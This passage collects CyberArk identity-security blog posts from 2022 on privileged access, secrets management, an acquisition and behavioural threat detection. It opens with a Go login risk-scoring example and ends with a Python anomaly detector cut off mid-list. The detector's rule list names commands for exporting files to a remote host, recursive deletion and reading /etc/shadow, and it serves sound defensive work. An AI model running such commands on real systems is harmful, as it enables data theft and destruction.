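import (
	"fmt"
	"net"
	"time"
)

// Profile is the per-user behavioural baseline. Its fields are an assumption
// for this example, not any product's data model.
type Profile struct {
	User      string
	Zone      *time.Location
	UsualFrom int      // earliest usual login hour, local time
	UsualTo   int      // latest usual login hour, local time
	KnownNets []string // CIDRs the user normally logs in from
	FailLimit int      // recent failures at which step-up is required
}

// Attempt is one "knock on the door".
type Attempt struct {
	At             string // RFC3339 timestamp, any offset
	IP             string
	RecentFailures int
}

// Decision carries the score and the reasons, so the SOC can see why a user
// was challenged.
type Decision struct {
	Score   int
	StepUp  bool
	Reasons []string
}

// Assess scores the attempt against the baseline: a burst of failures is a
// strong signal on its own; off-hours and an unfamiliar network are weak
// signals that only require step-up together. Weights are illustrative.
func Assess(p Profile, a Attempt) (Decision, error) {
	var d Decision
	ts, err := time.Parse(time.RFC3339, a.At)
	if err != nil {
		return d, fmt.Errorf("bad timestamp %q: %w", a.At, err)
	}
	ip := net.ParseIP(a.IP)
	if ip == nil {
		return d, fmt.Errorf("bad IP %q", a.IP)
	}
	if h := ts.In(p.Zone).Hour(); h < p.UsualFrom || h > p.UsualTo {
		d.Score += 2
		d.Reasons = append(d.Reasons, fmt.Sprintf("login at %02d:00 local, usual window %02d-%02d", h, p.UsualFrom, p.UsualTo))
	}
	known := false
	for _, cidr := range p.KnownNets {
		_, n, err := net.ParseCIDR(cidr)
		if err != nil {
			return d, fmt.Errorf("bad CIDR %q in profile: %w", cidr, err)
		}
		if n.Contains(ip) {
			known = true
			break
		}
	}
	if !known {
		d.Score += 2
		d.Reasons = append(d.Reasons, "source IP outside known networks")
	}
	if a.RecentFailures >= p.FailLimit {
		d.Score += 3
		d.Reasons = append(d.Reasons, fmt.Sprintf("%d recent failed attempts", a.RecentFailures))
	}
	d.StepUp = d.Score >= 3
	return d, nil
}

// RachelProfile mirrors the post's scenario. The CIDR is the documentation
// range TEST-NET-3, standing in for a Philadelphia-area home ISP prefix.
func RachelProfile() Profile {
	return Profile{
		User: "rachel", Zone: time.FixedZone("EDT", -4*3600),
		UsualFrom: 8, UsualTo: 9, KnownNets: []string{"203.0.113.0/24"}, FailLimit: 3,
	}
}

func main() {
	p := RachelProfile()
	for _, a := range []Attempt{
		{At: "2022-08-11T08:30:00-04:00", IP: "203.0.113.25"},                // her normal morning login
		{At: "2022-08-11T12:30:00Z", IP: "203.0.113.25", RecentFailures: 4}, // same moment in UTC, after failures
		{At: "2022-08-11T03:15:00-04:00", IP: "198.51.100.7"},               // off-hours from an unknown network
	} {
		d, err := Assess(p, a)
		fmt.Printf("%s %s step-up=%v score=%d %v err=%v\n", a.At, a.IP, d.StepUp, d.Score, d.Reasons, err)
	}
}
```

Note that timestamps are converted into the user's zone before the hour check, so a log source that reports in UTC does not make every 8:30 a.m. login look like a midday anomaly; that conversion is a common source of false step-ups in home-grown risk engines.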

Some organizations focus on this “people” part of Identity Security first. After all, humans continue to play a significant role in security incidents, with 82% of breaches in 2021 involving the human element.

Identity Security in the Real-World: Responsible for taming access sprawl across a massive portfolio, a CISO at a large consulting firm set an initial goal of protecting all workforce and customer identities. His team rolled out a series of strong access management controls to improve the organization’s overall security posture and its ability to defend against attacks at scale. Coupling these “wins” with mounting cyber insurance requirements, he built a compelling case for a unified Identity Security program. His team is now rolling out privileged access management to better understand – and demonstrate to insurance carriers – who or what has access to which sensitive resources, for what reasons and for how long.

Intelligent Privilege Controls

Back to our friend Rachel, who’s writing code in the cloud – something that requires her to access highly sensitive DevOps and CI/CD resources and tools. Rachel’s also got a handy bot helping her out behind the scenes so she doesn’t get bogged down with committing code to a repository. To do this, the bot needs privileged credentials. Some bots have credentials or secrets embedded into their scripts for efficiency’s sake, but that makes it easier for attackers to sniff them out.

Instead, intelligent privilege controls – the heart of Identity Security – are applied to both Rachel (the privileged human identity) and her trusty bot (the privileged machine identity). This enables Rachel to get into her cloud workspace, but only with minimal required access and for the least amount of time necessary. Meanwhile, the bot’s secrets are centrally secured and managed and can be retrieved exactly when they’re needed.

But it’s not just privileged identities that companies need to think about. In today’s environment, sensitive resources can live anywhere – and they’re widely accessible: 68% of non-humans or bots and 52% of workforce employees have access to sensitive data and assets. And virtually any identity can gain privileged access, depending on the context. Because of this, many organizations begin their Identity Security journeys with privileged access management.

Identity Security in the Real-World: For instance, a large regional bank in Africa focused initially on enforcing least privilege across all privileged and non-privileged workforce users to satisfy new SWIFT Customer Security Controls Framework (CSCF) requirements. When COVID-19 surged, the bank’s identity and access management (IAM) team quickly shifted focus to off-site vendors to help ensure secure third-party access to critical internal resources. By operationalizing vendor onboarding and access, the team is providing fast, secure connections for vendors in 14 different countries. The bank’s IAM team is now looking to extend Identity Security protections to the cloud and its software supply chain.

Continuous Identity Threat Detection and Prevention

Let’s check back in with Rachel, who has privileged access to cloud infrastructure but is also a “workforce user” on a hybrid workforce team. She’s just opened a browser tab for a popular project management app to ask a colleague a question. Sure, it’s an everyday interaction, but this app happens to contain a trove of IP data in the chat files.

If a threat actor from within or outside of Rachel’s company were able to guess or steal her password, they could log in, start rummaging around and find this confidential information. This is where privilege controls like session monitoring and AI-powered Identity Security Intelligence capabilities can detect threats earlier in the attack cycle. And automated authentication prompts can double-check that the person who initiated the session is the one who is still using the application as another security layer.

Identity Security in the Real-World: At Impact, an IAM leader at a multi-national investment bank recounted how limited visibility into user activity within web-based apps and cloud consoles made it difficult for his team to catch misuse or abuse of access to business applications. This was especially concerning since web-based management consoles allow users to make configuration changes and updates that can impact entire companies. By implementing controls such as continuous monitoring and authentication over these sensitive apps and tools, his team can more quickly identify, investigate and respond to production issues and risky user actions, while maintaining a low-friction user experience.

Flexible Identity Automation and Orchestration

Six months later, Rachel has decided to leave her current job and take a position elsewhere. Her employer has experienced significant churn over the past few years, which can make the process of manually provisioning and deprovisioning access an operational nightmare. Fortunately, by applying lifecycle management controls, the organization’s IT team can automatically shut off Rachel’s access and permissions at just the right time – free of human error. Not only does this help reduce cyber risk, but it also prevents cybersecurity debt accumulation in the form of unused and misconfigured identities. Meanwhile, the trusty helper bot retains its access and keeps working in support of another member of the development team.

Identity Security in the Real-World: In another example, a leading biotech company streamlined the management of application access requests across its business, in addition to enforcing MFA for all external network access and standing up a hybrid authentication and authorization system. Through it all, one tenet became abundantly clear to the organization’s senior IT architect of IAM: Never lose sight of the human owner behind the application. During Impact, he emphasized the importance of an organized directory that maps SSO apps to their respective owners, with redundant contacts, to improve SSO issue responsiveness and change communication. He spoke of automation’s key role in advancing IAM service delivery – and how, in his view, IDP platforms will increasingly focus on mapping application ownership and actively involving these stakeholders in the SSO application lifecycle journey.

Getting Started with Identity Security

Wherever you choose to start your Identity Security journey, the end goal should be the same: Secure any human or machine identity that accesses your organization’s resources, from anywhere and across the widest range of resources and environments – all done in a way that enables Zero Trust by enforcing least privilege.

As illustrated by these real-world success stories, with a unified approach to Identity Security, your organization can effectively defend against attacks and satisfy audit and compliance, while unleashing new levels of operational efficiency and propelling digital innovation forward.

CyberArk Acquires C3M, Accelerating Cloud Privilege Security and Cyber Risk Reduction https://www.cyberark.com/blog/cyberark-acquires-c3m-accelerating-cloud-privilege-security-and-cyber-risk-reduction/ Wed, 10 Aug 2022 12:50:43 +0000 https://www.cyberark.com/?p=133181 CyberArk C3M

In 2018, as cloud adoption was nearing a tipping point, and a series of major cyber attacks signaled the rise of the cloud service misconfiguration error, we founded C3M on the belief that cloud security done right can help safeguard organizations from costly data breaches and satisfy regulatory obligations. We’ve been honored to work alongside enterprises around the world, helping them seamlessly and securely embrace the full benefits of their Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform (GCP) environments.

Today, 89% of organizations use multiple cloud providers, with 63% of these organizations running more than 25% of their workloads in the cloud. As our journey to create a more secure and compliant cloud ecosystem continues, I’m excited to share that CyberArk has acquired C3M. 

Together, we have an opportunity to simplify the complex challenge organizations face in managing and securing all identities – human and machine – as they access sensitive resources and data in hybrid and multi-cloud environments. With a shared vision, an exceptional collaborative team, and the power of the market-leading CyberArk Identity Security Platform, we are setting a new industry standard for Cloud Privilege Security.

As the number of identities continues to grow exponentially, we’re hitting the ground running to accelerate the delivery of Identity Security innovations that help organizations to analyze, monitor and secure access to public cloud resources and achieve measurable cyber risk reduction.  

Accelerating Cloud Privilege Security Innovation Together  

Here’s a look at CyberArk’s comprehensive Cloud Privilege Security SaaS offerings, and how C3M talent and technologies will bolster specific analysis and monitoring capabilities to empower organizations to intelligently secure privileged access in the cloud.   

[Figure: Identity Security Platform – Cloud Privilege Security]

Analyze. Analyzing access in a cloud environment is a critical first step for safe and responsible cloud consumption. However, organizations can only mitigate the risks that they know exist. CyberArk Cloud Entitlements Manager analyzes and visualizes permissions across AWS, AWS Elastic Kubernetes Service (AWS EKS), Microsoft Azure and GCP, then provides policy recommendations to remove excessive permissions that violate least privilege access. Bringing C3M’s automated threat detection and incident capabilities for identity-related compliance violations and misconfigured cloud resources, coupled with behavioral baselining and risk-scoring for all identities, will further strengthen CyberArk’s intelligence and analytics offerings.   

Monitor. Monitoring identities as they access cloud resources is another essential Cloud Privilege Security component that allows organizations to rapidly identify and respond to misuse. The CyberArk Identity Security Platform already provides session auditing for both shared and Just-in-Time sessions to cloud resources. C3M will layer on additional monitoring capabilities that enhance cloud security teams’ ability to automatically identify risky behavior in the public cloud and continuously monitor specific resources.  

Secure. Intelligent privilege controls are the foundation of Identity Security. As organizations move to the cloud, enforcing least privilege everywhere is a key to enabling Zero Trust. CyberArk’s industry-leading Cloud Privilege Security capabilities, such as CyberArk Dynamic Privileged Access and CyberArk Secure Cloud Access, enable organizations to secure all identities that connect to cloud resources across shared account and federated access models. Only CyberArk helps secure both standing and Just-in-Time access across hybrid and multi-cloud environments.  

Joining with CyberArk is the next phase of our journey at C3M. We are extremely proud of the company we’ve built. We set out to build the world’s most comprehensive cloud security platform, and now, as part of a world-leading R&D organization that’s shaping the future of Identity Security, I’m confident we will do just that. I could not be more excited about what’s to come.  

Padmanabhan Viswanathan (Paddy) is founder and former CEO of C3M, and current VP of Cloud Security at CyberArk.
6 Identity Security Soundbites from David Higgins, CyberArk EMEA Technical Director https://www.cyberark.com/blog/6-identity-security-soundbites-from-david-higgins-cyberark-emea-technical-director/ Fri, 05 Aug 2022 13:00:51 +0000 https://www.cyberark.com/?p=133143 6 Identity and Cybersecurity Quotes

CyberArk EMEA Technical Director David Higgins works closely with some of the world’s largest and most heavily regulated organizations in architecting Identity Security strategies that help mitigate cyber risk and confidently enable digital business. Higgins recently sat down with Cybernews to explain how Identity Security fits into organizations’ broader cybersecurity programs and helps enable Zero Trust.

Here are six of our favorite soundbites from the conversation, which we’ve edited for length and clarity:

1. Identity is almost always the ingress point in the cyber attack chain. “Identity remains the go-to for threat actors looking for an effective and swift entry point to a business,” Higgins explains. For every human identity, there are 45 machine identities — and over half of an organization’s workforce has access to sensitive corporate data. These identities represent an expanded attack surface that adds pressure to mounting cybersecurity insurance and compliance requirements. “It’s a problem that’s getting larger and more complex as digital IT environments change, and malicious actors continually find new ways into their targets through identity compromise,” Higgins continues.

2. Yet it’s not always a security priority. “Less than half (48%) of organizations have Identity Security controls in place for their business-critical applications, to name just one key environment,” says Higgins. As organizations continue to embrace the cloud and prioritize major transformation projects, the number of digital identities continues to grow while cybersecurity investment lags. This causes an accumulation of cybersecurity debt that exposes organizations to even greater risk.

3. Identity Security’s role in Zero Trust. “The age-old adage that those protecting themselves need to get it right 100% of the time, whereas attackers only need to get it right once to wreak havoc, still holds true. That’s why Zero Trust’s premise — never trust, always verify — is vital to any forward-thinking cybersecurity strategy,” says Higgins. Identity Security is not Zero Trust, but instead, it encompasses key security layers — such as privileged access management, identity management, cloud privilege security and secrets management — that organizations need to defend against attacks, measurably reduce cyber risk, and ultimately, enable Zero Trust.

4. Why the Log4j vulnerability highlighted inherent risks across the software supply chain. “One type of attack can rarely be universally applied to so many different targets, and that’s what makes Log4j so serious. It can be likened to a wobbly Jenga block holding a towering puzzle above: If one brick at the bottom falls, the whole thing comes down,” Higgins explains.

5. How organizations can strengthen cyber resilience in preparation for the next major software supply chain vulnerability, ransomware attack or emerging threat. “It’s impossible to keep out every attack, every time,” notes Higgins. “Instead, the focus and best practice should be around working to prevent attackers from moving to their objective – whether that is to spread malware, harvest data or shut down a critical service – once they are inside a system. This starts with identity … By securing routes to their most critical assets with intelligent privilege controls; seamlessly securing access for all identities with strong, adaptive authentication; and removing hard-coded secrets to protect credentials across the CI/CD pipeline, an organization can dramatically improve its overall security posture.”

6. Attackers never stop innovating. “Cybercriminal groups are increasingly operating like legitimate businesses. This way of working means large criminal groups have unwittingly created their own attack surfaces, opening themselves up to risk,” says Higgins. “It’s likely that the need to secure themselves internally will force security to revamp – as adversaries will increasingly get caught by defenders using their own attack methods against them. This change may bring with it plenty of new, innovative tactics, techniques and procedures that organizations need to be prepared to protect against.”

Today’s fast-evolving threat environment requires a security-first approach to protecting human and machine identities, one capable of outpacing attacker innovation. For more Identity Security perspectives, read the full Cybernews interview.

5 Hot Takes from AWS re:Inforce 2022 https://www.cyberark.com/blog/5-hot-takes-from-aws-reinforce-2022/ Fri, 29 Jul 2022 13:00:19 +0000 https://www.cyberark.com/?p=133091 5 Hot Takes from AWS re:Inforce 2022

The city of Boston was hot this July – and we’re not just talking about record-breaking temperatures. The cybersecurity community showed up and turned up the heat, exploring Identity Security-fueled strategies at CyberArk Impact, then advancing critical cloud conversations on identity, security and privacy at AWS re:Inforce. With so many burning topics on our minds, we’re coming in hot with five key takeaways from AWS’ annual cybersecurity conference.

1. Identity Security is the Core of Cloud Security

“Identity,” as Karen Haberkorn, director of product management for AWS IAM, described it, “is any uniquely recognizable entity that requires access to [AWS] resources.” Your cloud or hybrid architecture is sure to be crowded with identities – from human identities like internal employees and third-party vendors to machine identities like service accounts or AWS Lambda serverless functions. Any of these identities can be exploited to gain access to critical cloud infrastructure, steal or alter sensitive data, or interrupt cloud-hosted services. The message was clear: Identity is the core of cloud security.

Haberkorn stressed fundamental Identity Security best practices worth repeating: Federate human access, require multi-factor authentication (MFA), apply least privilege permissions, rotate access keys regularly, safeguard root user credentials, and regularly review and remove unused access. Many presenters echoed this guidance, while emphasizing consistency, simplification and granularity as keys to strong identity-based security, access control and resource management.

2. Least Privilege Access Is Essential – and It Must Balance with Business Needs

AWS Chief Security Officer Stephen Schmidt believes that “who has access to what, and why?” is one of the most important security questions. “An overly permissive environment guarantees you headaches,” agreed AWS CISO CJ Moses. Why? Because “humans and data don’t mix!” Having a least privilege scheme is a non-negotiable defense-in-depth mechanism – now more than ever, given the key roles of lateral movement and privilege escalation in ransomware and software supply chain attacks.

Moses pointed out the central role of just-in-time provisioning in a least privilege model, as always-on, standing access presents notable risk. “If you’re on vacation, your access should be as well,” he noted. Further guidance from AWS leadership on restricting access to sensitive resources based on user location drove this point home. But don’t jump into privileged access management without a plan, cautioned a speaker from a major financial institution. Long-term security controls cannot be exclusively tied to short-term organizational structures. Security needs a stable foundation, it needs to strike the right balance between control and flexibility, and it needs a solid roadmap.

3. You Can’t Buy Zero Trust — Defense in Depth Is How to Get There

Least privilege is a cornerstone of Zero Trust – another hot topic at the show. But there isn’t a security tool on the planet that can flip on a Zero Trust switch. Every organization needs multiple lines of defense because “single controls will fail,” said Moses. He emphasized the need for independent, yet integrated, controls that talk to one another as part of a cybersecurity mesh architecture, and urged organizations to embrace their responsibilities in protecting data, applications, endpoints, networks and identities in their hybrid cloud environments. Some defense-in-depth directives were inescapable, like one keynote slide featuring just two words: “Enable MFA.” If you haven’t done it, do it. Full stop.

And speaking of hot topics, “user experience” would have been a winning buzzword bingo square. Winston Churchill’s “we shape our buildings; thereafter they shape us” quote captured the need for security programs built for actual people. Enhancing the end-user experience with things like native session isolation and unified administration of security controls, for instance, makes it easier for people to do the right thing.

4. Provable Security Starts with People

While AWS re:Inforce is a technology conference, the human side of cybersecurity was featured prominently. We heard about AWS’ goal of creating a “culture of provable security” – one in which everyone is accountable. Look for “changing moments” to reinforce security culture and remember that diversity brings more diversity to give your cybersecurity program a critical edge, encouraged AWS leaders. BUT, they also warned against “relying on heroics” from staff. Even the best security practitioners need ways to automate and simplify their work so they can stop threats before they stop business. This, too, makes interoperability and technology integrations essential.

5. Software Supply Chain Security Must Be Smart and Simple

Log4j and SolarWinds-type attacks are a reality, which is why it’s so important to bake security and continuous risk monitoring into CI/CD pipelines and application portfolios, noted AWS and third-party experts. Weaving security into the development lifecycle and operations also makes security reviews quicker and more uneventful, helping to keep projects – and budgets – on track. At the end of the day, keynote speakers said, the goal should be to make the secure path the path of least resistance. Otherwise, people will keep finding ways around it.

AWS Marketplace Vendor Insights is a great example of smart software supply chain security in action. Announced at the show, the new service provides continuous risk monitoring for all vendors on the AWS Marketplace, so if a vendor’s security risk profile changes, AWS customers using that vendor’s services will be notified.

We’ll wrap things up with a favorite soundbite from the show: “Security can’t be the office of no, but rather partners to enable the business by saying ‘Yes, but …’ or ‘Yes, and …’” We couldn’t agree more – in fact, allowing developers to use their preferred cloud-native tools while security teams can manage secrets with CyberArk is exactly what our newly announced Secrets Hub aims to do. We had a lot of fun at the AWS re:Inforce CyberArk booth demonstrating how developers can keep using native tooling while security teams gain centralized visibility and control of application secrets.

We also showed how CyberArk Identity SSO now integrates with AWS Control Tower, unlocking better security and governance in the cloud.

Read “Identity Security: Why It Matters and Why Now” to learn more about how an Identity Security-first mindset can help strengthen and reinforce your cybersecurity program.

9 Reasons to Simplify Secrets Management https://www.cyberark.com/blog/9-reasons-to-simplify-secrets-management/ Wed, 27 Jul 2022 13:00:48 +0000 https://www.cyberark.com/?p=133027 Easy Secrets Management for DevSecOps

Eighty-seven percent of IT decision-makers[1] say their organizations are implementing DevOps, yet achieving DevSecOps excellence isn’t easy, especially as machine identities and secrets continue to pile up across development pipelines and application portfolios. While there isn’t one specific standard for evaluating DevSecOps maturity, most teams would agree that both speed and security are critical metrics — and that the two are at constant odds.

As organizations continue to move to the cloud and evolve hybrid architectures, here are nine reasons why developers need a simplified approach to secrets management to keep moving fast while giving security teams a streamlined way to enforce policies.

1. “Elite” DevOps organizations — or the highest-performing teams — routinely deploy on demand and perform multiple deployments per day.[2] For instance, Amazon engineers reportedly deploy code every 11.7 seconds, on average.[3]

2. Compared to low-performing teams, elite DevOps teams have 973x more code deployments, and a 6570x faster lead time from commit to deploy.[4] To put it simply, they focus on fast.

3. CI/CD pipeline automation enables these DevOps teams to build and deploy applications at unprecedented speed and scale. It also creates new machine identities and application secrets — credentials, SSH keys, certificates, API keys — in massive quantities. Today, machine identities outnumber human identities 45:1.[5]

4. In half of organizations,[6] the task of securing application secrets is left up to developers, who often emphasize speed and collaboration over proper security practices as they work under increasing pressure and tight timeframes.

5. In fact, 36% of developers say meeting deadlines[7] is the primary reason their coding still possesses vulnerabilities. Yet cybersecurity debt in the form of unsecured secrets in code can compound rapidly with every release.

6. Security teams face an extremely difficult balancing act of enabling development velocity while consistently enforcing fundamental cybersecurity policies, such as least privilege, across the organization: 80% admit that developers have more privileges than they need.[8]

7. Many organizations rely on the native secrets management capabilities in their cloud and DevOps tools to simplify development and operations. But when secrets are stored and managed differently across various teams and projects — which 87% of organizations say is the case[9] — “secrets sprawl” can cause conflict with centralized security goals, create opportunities for cyber attackers and have a dangerous ripple effect down the software supply chain.

8. Seventy-one percent of organizations suffered a successful software supply chain-related attack that resulted in data loss or asset compromise in the last 12 months.[10]

9. Shifting left by finding a more secure, consistent way to access secrets doesn’t just enhance overall cybersecurity posture — it can also unlock new levels of efficiency. Streamlining and automating secrets management processes, such as onboarding applications and rotating secrets, can accelerate cloud migration efforts by unblocking development, keeping existing workflows intact and making it easier for developers to code securely from the start. It’s by integrating security practices throughout the development process that top-performing DevOps teams are 1.6 times more likely to meet or exceed their organizational goals.[11]

As you build out your comprehensive Identity Security program, securing machine identities and application secrets everywhere they exist is critical to reducing security vulnerabilities, minimizing the attack surface and streamlining operations. But it can’t slow down development teams or delay automation initiatives. After all, speed is the currency of business.

With the right centralized secrets management approach, you won’t have to choose between speed and security as you work toward DevSecOps maturity — you’ll get the best of both worlds.

4 reasons to centralize secrets management

With CyberArk, you can strengthen security across the DevOps pipeline and add value to enable your digital business. Our recently launched Secrets Hub, a SaaS solution that is part of the CyberArk Identity Security Platform, delivers effective secrets management in hybrid environments, fulfills developer preferences for choice and gives security teams a way to retain centralized control and enforce unified policies over secrets using existing processes and infrastructure.

SOURCES

[1] Puppet 2021 State of DevOps Report

[2], [4], [11] Accelerate State of DevOps 2021 Survey

[3] Tech Beacon, “10 Companies Killing it at DevOps”

[5], [6], [8], [9], [10] CyberArk 2022 Identity Security Threat Landscape Report

[7] HelpNetSecurity, “86% of Developers Don’t Prioritize Application Security”
CyberArk Named a Leader in the 2022 Gartner® Magic Quadrant™ for PAM Again https://www.cyberark.com/blog/cyberark-named-a-leader-in-the-2022-gartner-magic-quadrant-for-pam-again/ Fri, 22 Jul 2022 15:34:45 +0000 https://www.cyberark.com/?p=132783 CyberArk a PAM Leader Gartner Magic Quadrant

CyberArk is proud to announce it has been named a Leader in the 2022 Gartner® Magic Quadrant™ for Privileged Access Management.[1] The company was positioned both highest in ability to execute and furthest in completeness of vision for the fourth time in a row.

According to Gartner, “While core PAM products continue to be important security tools, shifting demand in the market has brought new emphasis on the cloud, from SaaS delivery of PAM tools, to expanding the functionality for cloud security in PAM tools, including secrets management and CIEM.”[2]

We thank our customers and partners for inspiring and driving us fearlessly forward each day to innovate and be their trusted advisor. We also want to thank our employees across the globe for always putting customers first and for their outstanding dedication. This distinction is because of you.

CyberArk’s PAM Point of View: Our History and Identity Security’s Grounding Center

Privileged access management is the strong foundation upon which CyberArk was built — it’s who we are and what we proudly introduced to the market. Since the beginning, CyberArk has brought a security-first mindset aimed at helping global organizations protect the heart of the dynamic enterprise. As we’ve continued to evolve as an organization, privileged access management has remained solidly in place as our core. Today, more than 7,500 customers, including the majority of Fortune 500 companies and many government organizations around the world, trust CyberArk to secure their most valuable assets.

Grounded in privileged access management, we have become much more with the development of a holistic Identity Security Platform capable of enabling digital transformation and helping to stop more sophisticated cyber threats. Picture a massive constellation of user identities — human and machine — accessing various corporate resources from homes, offices, co-working spaces and public transport, and spanning data centers, operational technologies, and hybrid, multi-cloud and SaaS environments. Every single identity is a target for attackers. Every single identity can have powerful privileged access. And because of this, every single identity needs strong security protections.

Since CyberArk put a stake in the ground detailing our expanded Identity Security vision and strategy, we’ve continuously raised the bar for innovation and progressed further along our roadmap. We believe Identity Security — which unifies privileged access management, access management and identity management in a single platform that can enable seamless, secure access for any identity to any resource or environment from anywhere using any device — is the key to strengthening cyber resilience and unlocking greater operational efficiency. And as organizations of all sizes and kinds move toward a Zero Trust future, the ability to dynamically enforce policy, authentication and authorization will help pave the way.

In our view, it has never been more important to consistently enforce least privilege everywhere with standing and just-in-time access, session isolation and monitoring, elevation and delegation, and credentials and secrets management. Today’s challenges — and the ones yet to come — call for an advanced, unified approach that centers on these intelligent privilege controls, while enabling seamless, secure access for all identities, and flexibly automating the identity lifecycle with continuous threat detection and protection. This is Identity Security, and we believe now is the moment to embrace it.

Our focus at CyberArk remains solidly on execution. Earlier this month at CyberArk Impact 2022, we announced new innovations and significant advancements in privileged access management, identity management, cloud privilege security, and secrets management to give organizations the confidence they need to accelerate business transformation with less risk. And to echo CyberArk Founder, Chairman and CEO Udi Mokady, “We are just getting started.”

Download the Full Complimentary Report

To learn more, download the full 2022 Gartner Magic Quadrant for Privileged Access Management report.

[1], [2] Gartner® Magic Quadrant™ for Privileged Access Management, by Michael Kelley, James Hoover, Felix Gaehtgens, Abhyuday Data, 19 July 2022

Gartner and Magic Quadrant are registered trademarks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

What to Do When Digital Identities Start Doing “Stranger Things” https://www.cyberark.com/blog/what-to-do-when-digital-identities-start-doing-stranger-things/ Wed, 20 Jul 2022 13:17:29 +0000 https://www.cyberark.com/?p=132722 What to Do When Digital Identities Start Doing “Stranger Things”

The long-awaited volume 2 of “Stranger Things” season 4 dropped this month. Fellow fans likely tracked three unique storylines this season, and it was a good thing the last two episodes were feature-length, because we had a lot of questions. Now that CyberArk Impact 2022 has wrapped, we have some time to get caught up!

A particularly gruesome “Stranger Things” plotline that kept everyone guessing was the one in which teenagers across the town of Hawkins started getting killed, one by one. But before each person met their untimely demise, they started acting … well, strangely … experiencing headaches and nightmares suggesting that Vecna, the mysterious evil being from the Upside Down, was beginning to take hold. This foreshadowing helped viewers brace for the grisly scenes ahead, and fed fan theories about how the season would play out. (We won’t give away any more than that!)

Beyond the Upside Down in a different shadowy realm, cybersecurity teams also look for digital clues such as hashes, domain names, IPs and DNS requests that could signal potential problems. Many rely on security information and event management (SIEM) tools to aggregate and analyze large volumes of threat data. But when it comes to detecting strange or risky behavior linked to authorized users – workforce or privileged identities within their organizations or those associated with third-party vendors – these teams are often in the dark until after systems have been compromised and damage is done.

A big part of the problem is that identity-driven attacks from inside are especially hard to detect. While most organizations have made Identity Security investments to secure privileged access to sensitive resources, they lack visibility and control over what is being done during legitimate user sessions and how confidential data is being handled. Unlike “Stranger Things” viewers, security teams don’t have the benefit of looming grandfather clock visions or ominous ticking noises in the background to put them on high alert.

Instead, malicious insiders (or external attackers posing as legitimate insiders) abuse credentials to progress their attacks, quietly looking for ways to bypass privileged access management controls on sensitive systems. Without a reliable, automatic way to respond to such attempts, organizations have a significant blind spot: 80% of enterprise security leaders report employee misuse or abuse of access to business applications, which often contain high-value data like financial records, customer or patient information, or intellectual property. And nearly half say they have limited ability to view user logs and audit user activity, making it difficult to pinpoint risky behavior.

How to Detect and Block “Strange” User Behavior – Before Time Runs Out

Manually investigating questionable user activity eats up time and valuable resources, as does auditing entire user sessions without the aid of risk scoring to flag strange or risky activity. These inefficient processes can often cut into other critical cybersecurity priorities, such as shoring up ransomware protection and bolstering incident response.

Fortunately, much like the headaches and creepy background music signaling that “stranger things” are about to take place on the TV show, behavioral abnormalities (e.g., abnormal login behavior or signs of potential theft of privileged credentials) can indicate that risky or malicious activity is happening in your IT environment.

Identity Security programs take advantage of analytics to build behavioral baselines for the workforce and privileged users within an organization. Using this baseline, and with the help of artificial intelligence, teams can continuously analyze user behaviors and workforce identity patterns at scale, automatically detecting strange or risky privileged security events earlier in the attack lifecycle. For instance, they could configure security controls and define rules to receive instant alerts if an employee enters a risky command during a privileged session or tries to delete or export sensitive files from a web application.

Teams no longer need to dig through logs to figure out what went wrong – and if they do opt to review logs and session recordings, they can skip ahead to the moment the risky behavior occurred. This enhanced, real-time visibility into user activity can help reduce the risk of stolen credentials for both workforce and IT users as they access web applications and infrastructure, while helping organizations to quickly detect and respond to potential threats before they can cause damage. And if an identity does show signs of influence from the villainous “Upside Down,” threat detection and protection capabilities give teams the right info, right when they need it, to take quick action, such as terminating user sessions.
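The two mechanisms described above, a learned per-user baseline and a small set of explicit rules for risky commands, can be sketched in a few dozen lines. The following is an added example written for this post, not CyberArk code and not how Identity Security Intelligence is implemented; the session events, the user names, the IP addresses and the risky-command patterns are all constructed for illustration, and the scores and threshold are arbitrary weights chosen to show how baseline deviations and rule hits combine into one alert.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class Event:
    """One privileged-session event (constructed sample data, not real telemetry)."""
    user: str
    hour: int       # hour of day the command was run, 0-23
    src_ip: str
    command: str


@dataclass
class Baseline:
    """What 'normal' looks like for one user, learned from history."""
    ips: set = field(default_factory=set)
    hours: set = field(default_factory=set)
    programs: set = field(default_factory=set)


# Hypothetical rule set: command patterns a privileged-session policy treats as
# risky regardless of baseline (exporting or deleting sensitive data, etc.).
RISKY_PATTERNS = [
    (re.compile(r"\bscp\b.*@"), "file export to a remote host"),
    (re.compile(r"\brm\s+-rf\b"), "recursive delete"),
    (re.compile(r"/etc/shadow"), "access to the local credential store"),
]


def _program(command):
    """First token of a command line (the program name), '' if empty."""
    parts = command.split()
    return parts[0] if parts else ""


def build_baselines(history):
    """Learn per-user baselines (source IPs, active hours, programs) from past events."""
    baselines = defaultdict(Baseline)
    for ev in history:
        b = baselines[ev.user]
        b.ips.add(ev.src_ip)
        b.hours.add(ev.hour)
        b.programs.add(_program(ev.command))
    return dict(baselines)


def score_event(baseline, ev):
    """Return (risk score, reasons) for one event against a user's baseline."""
    score, reasons = 0, []
    if baseline is None:
        score += 30
        reasons.append("no baseline for user")
    else:
        if ev.src_ip not in baseline.ips:
            score += 30
            reasons.append(f"new source IP {ev.src_ip}")
        if ev.hour not in baseline.hours:
            score += 20
            reasons.append(f"activity at unusual hour {ev.hour:02d}:00")
        if _program(ev.command) not in baseline.programs:
            score += 10
            reasons.append(f"program '{_program(ev.command)}' not seen before")
    # Rule hits apply whether or not the user has a baseline.
    for pattern, label in RISKY_PATTERNS:
        if pattern.search(ev.command):
            score += 50
            reasons.append(f"risky command: {label}")
    return score, reasons


def detect(history, new_events, threshold=50):
    """Score new events against learned baselines; return those at or over threshold."""
    baselines = build_baselines(history)
    alerts = []
    for ev in new_events:
        score, reasons = score_event(baselines.get(ev.user), ev)
        if score >= threshold:
            alerts.append((ev, score, reasons))
    return alerts


# Constructed history: alice works 09:00-17:00 from one workstation, running two programs.
HISTORY = [
    Event("alice", hour, "10.0.0.5", cmd)
    for hour in range(9, 18)
    for cmd in ("ls -la /srv/finance", "systemctl status nginx")
]

# Constructed new events: one normal, one off-hours export from a new IP, and
# one user with no history reading the credential store.
NEW_EVENTS = [
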